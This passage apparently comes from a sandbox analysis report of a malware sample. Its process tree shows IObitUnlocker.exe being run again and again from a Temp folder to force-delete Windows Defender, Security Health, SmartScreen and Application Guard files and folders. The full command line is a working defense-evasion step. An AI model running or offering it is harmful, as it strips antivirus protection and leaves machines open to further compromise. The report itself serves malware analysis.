Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:3160
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5156
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                          10⤵
                                                                                                                                                                                            PID:5252
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                            10⤵
                                                                                                                                                                                              PID:5208
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:5176
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                10⤵
                                                                                                                                                                                                  PID:2252
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:5656
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:3148
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                          PID:5148
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:1988
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
